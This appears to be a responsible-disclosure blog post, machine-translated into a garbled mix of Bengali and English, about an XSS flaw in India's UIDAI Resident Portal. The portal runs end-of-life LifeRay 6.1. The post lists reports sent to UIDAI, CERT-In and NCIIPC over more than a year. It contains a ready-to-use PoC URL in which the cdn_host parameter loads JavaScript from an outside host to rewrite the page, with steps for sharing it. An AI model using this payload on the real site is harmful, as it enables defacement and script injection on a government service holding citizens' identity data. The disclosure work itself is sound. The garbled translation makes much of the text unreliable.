আক্রমণ্যতা রিপোর্ট resident.uidai.gov.in allows anyone to change content on the UIDAI website. The UIDAI Resident Portal has direct access to Aadhaar demographic data. The vulnerability (XSS) allows anyone to embed any tweet on the UIDAI website

আক্রমণ্যতা

The UIDAI Resident Portal (with read access to entire Aadhaar Demographic data) is runing a vulnerable version of LifeRay software. It is running LifeRay 6.1, which was declared End-of-Life in Febrary 2016.

This release includes multiple known vulnerabilities, including:

  1. A XSS issue, for which a PoC can be found at resident.uidai.gov.in (Picture Credits: @sanitarypanels)
  2. Multiple RCEs: See ইস্যু-62 for eg.

বস্তুত মুক্তি তাই পুরানো এটা এমনকি প্রদর্শিত না "পরিচিত দুর্বলতা" page on the LifeRay website; you have to go look at their আর্কাইভ করা দুর্বলতা

POC

আপনি পদ্ধতি এটা XSS সমস্যার জন্য ধারণা সহজ প্রুফ জানতে পারেন resident.uidai.gov.in

দ্য cdn_host পরামিতি থেকে javascript উদ্বুদ্ধ $CDN_HOST/Resident-theme/js/custom.js, in this case https://scan.bb8.fun/Resident-theme/js/custom.js which hosts a small snippet to overwrite the HTML of the page.

It shows up like:

মজা

বর্তমান স্ক্রিপ্ট কোনো কিচ্কিচ্ এম্বেড একটি ব্যবহার করার জন্য অনুমতি দেয় tweet parameter. To embed:

Go to any tweet, copy the part after twitter.com এবং এটি পাস tweetparameter. For eg, to embed this tweet:

আধার চক্রবৃদ্ধি ওয়াল@ 13footwall

Breaking: Exclusive footage from inside @ইউআইডিএআই‘s IT department after media reports of Aadhaar data leaks.

  1. Look at the URL: https://twitter.com/13footwall/status/979301578686345216
  2. কপি 13footwall/status/979301578686345216 এবং এটি পাস tweet parameter:
  3. URL টি হয়েhttps://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun&tweet=13footwall/status/979301578686345216
  4. এটা ভাগ করে নিন

প্রতিবেদনটি

আমি প্রথমে এই রিপোর্ট help@uidai.gov.in in Jan 2017:

Forgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:

This is still not fixed. Here is a complete timeline:

তারিখWhat?
16 Jan 2017প্রাথমিকভাবে প্রতিবেদন help@uidai.gov.in. No response
21 Jan 2018প্রতিবেদন করা ceo@uidai.gov.in এবং info@cert-in.org.in. No response
19 Feb 2018অনুস্মারক পাঠানো ceo@uidai.gov.in এবং info@cert-in.org.in
19 Feb 2018CERT থেকে স্বীকৃতি
15 Mar 2018Reminder sent. No response
17 Mar 2018বিজ্ঞাপিত NCIIPC
18 Mar 2018Confirmation from NCIIPC asking for more details. I replied back with a quote of previous exchange
19 Mar 2018Confirmation from NCIIPC thanking me for the report.
19 Apr 2018অনুস্মারক স্বীকৃতি চাওয়ার ইউআইডিএআই পাঠানো
30 May 2018অনুস্মারক NCIIPC এবং CERT আপডেটের জন্য জিজ্ঞাসা পাঠানো

শুধুমাত্র পরিবর্তন আমি যেহেতু আমার প্রাথমিক রিপোর্ট যে ওয়েবসাইট প্রকাশক বন্ধ থেকে থাকে সচেতন আছি একটি HTTP প্রতিক্রিয়া হেডারের মধ্যে LifeRay সংস্করণ

মূলত প্রকাশিত এখানে


মন্তব্য করুন

আপনার ই-মেইল এ্যাড্রেস প্রকাশিত হবে না। * চিহ্নিত বিষয়গুলো আবশ্যক।